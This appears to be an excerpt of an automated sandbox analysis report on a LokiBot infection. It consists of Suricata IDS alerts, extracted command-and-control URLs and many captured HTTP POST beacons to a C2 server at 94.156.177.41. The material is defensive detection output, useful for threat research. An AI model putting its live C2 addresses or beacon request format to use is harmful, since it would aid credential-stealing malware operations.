                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49750 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49908 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49948
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49871 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49871 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49908 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49871 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49806 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49908
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49862
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49936 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49979 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49845
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49979 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49979 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49942 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49979 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49979
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49871
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49867
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49936 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49959
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49888 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49942
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49888 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49917 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49775
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49931 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49931 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49931 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49917 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49806
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49931 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49888 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49811
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49888 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49837 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49837 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49837 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49837 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49857 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49984
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49936
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49917
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49931
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49837
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49857
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49975 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49975 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49975 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49923 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49923 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49888
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49923 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49893 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49965 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49893 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49965 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49893 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49965 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49975 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49750
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49965 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49923 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49965
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49975
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49893 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49923
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49762 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49762 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49762 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49893
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49762 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49762
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49818 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49818 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49818 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49818 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49818
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49913 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49913 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49913 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49913 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49913
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49951 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49951 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49951 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49951 -> 94.156.177.41:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49951
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.5:49824
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractorURLs: 94.156.177.41/soja/five/fre.php
                      Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                      Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 153Connection: close
